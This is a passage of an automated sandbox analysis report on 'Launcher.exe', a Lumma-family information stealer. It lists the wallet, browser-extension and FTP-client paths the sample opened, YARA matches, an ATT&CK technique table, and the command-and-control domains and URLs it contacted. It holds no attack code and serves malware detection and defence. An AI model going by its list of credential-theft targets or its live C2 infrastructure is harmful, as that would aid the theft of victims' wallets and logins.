                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2349716206.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2348231788.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2346332053.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2348803317.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2343011519.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2349091115.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2346946917.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2183979276.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2343830924.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2345580376.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2347665217.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2318603921.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2344743144.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6292, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6292, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                12
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager151
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS12
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Launcher.exe44%VirustotalBrowse
                Launcher.exe39%ReversingLabsWin32.Trojan.Lumma
                Launcher.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                sustainskelet.lat0%URL Reputationsafe
                crosshuaht.lat0%URL Reputationsafe
                energyaffai.lat0%URL Reputationsafe
                necklacebudi.lat0%URL Reputationsafe
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.55.153.106
                truefalse
                  high
                  lev-tolstoi.com
                  104.21.66.86
                  truefalse
                    high
                    sustainskelet.lat
                    unknown
                    unknowntrue
                    • 0%, URL Reputation
                    unknown
                    crosshuaht.lat
                    unknown
                    unknowntrue
                    • 0%, URL Reputation
                    unknown
                    rapeflowwj.lat
                    unknown
                    unknownfalse
                      high
                      grannyejh.lat
                      unknown
                      unknownfalse
                        high
                        aspecteirs.lat
                        unknown
                        unknownfalse
                          high
                          sweepyribs.lat
                          unknown
                          unknownfalse
                            high
                            discokeyus.lat
                            unknown
                            unknownfalse
                              high
                              energyaffai.lat
                              unknown
                              unknowntrue
                              • 0%, URL Reputation
                              unknown
                              necklacebudi.lat
                              unknown
                              unknowntrue
                              • 0%, URL Reputation
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              aspecteirs.latfalse
                                high
                                sweepyribs.latfalse
                                  high
                                  sustainskelet.latfalse
                                    high
                                    rapeflowwj.latfalse
                                      high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        energyaffai.latfalse
                                          high
                                          https://lev-tolstoi.com/apifalse
                                            high
                                            grannyejh.latfalse
                                              high
                                              necklacebudi.latfalse
                                                high
                                                crosshuaht.latfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/chrome_newtabLauncher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://steamcommunity.com/?subsection=broadcastsLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://store.steampowered.com/subscriber_agreement/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEELauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.valvesoftware.com/legal.htmLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lev-tolstoi.com/urTLauncher.exe, 00000003.00000003.2318562532.000000000101B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://community.fastly.steamstatic.com/public/shared/imLauncher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://lev-tolstoi.com/SLauncher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englLauncher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lev-tolstoi.com/piCLauncher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/Launcher.exe, 00000003.00000003.2482019704.000000000101D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483291933.000000000101D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://store.steampowered.com/privacy_agreement/Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/points/shop/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lev-tolstoi.com/apis/dLauncher.exe, 00000003.00000003.2482226766.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLauncher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
